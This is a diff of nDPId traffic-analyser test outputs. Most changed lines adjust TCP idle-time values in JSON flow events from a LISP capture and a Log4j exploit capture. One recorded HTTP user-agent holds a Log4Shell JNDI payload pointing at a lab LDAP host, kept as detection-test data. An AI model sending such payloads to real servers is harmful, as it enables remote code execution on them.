-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597152687289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687289,"pkt":"qrvMAAEAqrvMAAIACABFwAAs6QkAAP8Gx\/4KAHsCCgB7ATwNEPYND3HOAAAAAGACQACCQgAAAgQFtAAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597152687290,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687290,"pkt":"qrvMAAIAqrvMAAEACABFwAAszvYAAP8G4hEKAHsBCgB7AhD2PA22haFWDQ9xz2ASQAAqVQAAAgQFtAAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597152687291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152687291,"pkt":"qrvMAAEAqrvMAAIACABFwAAo6QoAAP8GyAEKAHsCCgB7ATwNEPYND3HPtoWhV1AQQABCEgAAAAAAAAAA"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152687289,"flow_last_seen":1597152687289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152687289,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597152687289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687289,"pkt":"qrvMAAEAqrvMAAIACABFwAAs6QkAAP8Gx\/4KAHsCCgB7ATwNEPYND3HOAAAAAGACQACCQgAAAgQFtAAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597152687290,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687290,"pkt":"qrvMAAIAqrvMAAEACABFwAAszvYAAP8G4hEKAHsBCgB7AhD2PA22haFWDQ9xz2ASQAAqVQAAAgQFtAAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597152687291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152687291,"pkt":"qrvMAAEAqrvMAAIACABFwAAo6QoAAP8GyAEKAHsCCgB7ATwNEPYND3HPtoWhV1AQQABCEgAAAAAAAAAA"} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACQAEwAAP8RsEwKAHsDCgB7ARD2EPYAfBP6MgABAnsDNrGOEKjEAAEAFGka+80ImORwcY2JmGWtrFsZgmcCAAAFoAEaEAAAAAABwKhnAP8hISEABQABCgB7AwAABaABIBAAAAAAAQoAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACoAE0AAP8RsDMKAHsDCgB7ARD2EPYAlFlmMgABAqopDMUFFm31AAEAFBocdBgtY+Hz9Ueh9UZxQJ1vv2IjAAAFoAFAEAAAAAAC\/AABkgFoAQMAAAAAAAAAAP8hISEABQABCgB7AwAABaABgBAAAAAAAvwAAAAAAAAAAAAAAAAAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACAAE4AAP8RsFoKAHsDCgB7ARD2EPYAbDmBMgABAXFyKntOHooaAAEAFI0ikSo37n3NSMdaLlvkb41n5QfMAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhnACEhISEABQABCgB7A1nrP7n6mR0\/7wBSicl\/O30AAAAAAAAAAA=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152711673,"flow_last_seen":1597152711673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152711673,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597152711673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711673,"pkt":"qrvMAAEAqrvMAAMACABFwAAsuMMAAP8G+EMKAHsDCgB7Ac8DEPZkcBpBAAAAAGACQADvdgAAAgQFtAAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597152711674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711674,"pkt":"qrvMAAMAqrvMAAEACABFwAAsBk8AAP8GqrgKAHsBCgB7AxD2zwMtqeWdZHAaQmASQADcHgAAAgQFtAAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597152711674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152711674,"pkt":"qrvMAAEAqrvMAAMACABFwAAouMQAAP8G+EYKAHsDCgB7Ac8DEPZkcBpCLanlnlAQQADz2wAAAAAAAAAA"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152711673,"flow_last_seen":1597152711673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152711673,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597152711673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711673,"pkt":"qrvMAAEAqrvMAAMACABFwAAsuMMAAP8G+EMKAHsDCgB7Ac8DEPZkcBpBAAAAAGACQADvdgAAAgQFtAAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597152711674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711674,"pkt":"qrvMAAMAqrvMAAEACABFwAAsBk8AAP8GqrgKAHsBCgB7AxD2zwMtqeWdZHAaQmASQADcHgAAAgQFtAAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597152711674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152711674,"pkt":"qrvMAAEAqrvMAAMACABFwAAouMQAAP8G+EYKAHsDCgB7Ac8DEPZkcBpCLanlnlAQQADz2wAAAAAAAAAA"} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152709936,"flow_last_seen":1597152709943,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":868,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152685554,"flow_last_seen":1597152685560,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-data-len":3790,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1597152712034} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 diff --git a/test/results/log4j-webapp-exploit.pcap.out b/test/results/log4j-webapp-exploit.pcap.out index 4705672ea..385ec1153 100644 --- a/test/results/log4j-webapp-exploit.pcap.out +++ b/test/results/log4j-webapp-exploit.pcap.out @@ -1,56 +1,56 @@ 00471{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639425815407} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815407,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815407,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815407,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815407,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAABAkKsEO4KrBDuCgAAAAAAAKwQ7gs="} 00196{"error_event_id":2,"error_event_name":"Unknown L3 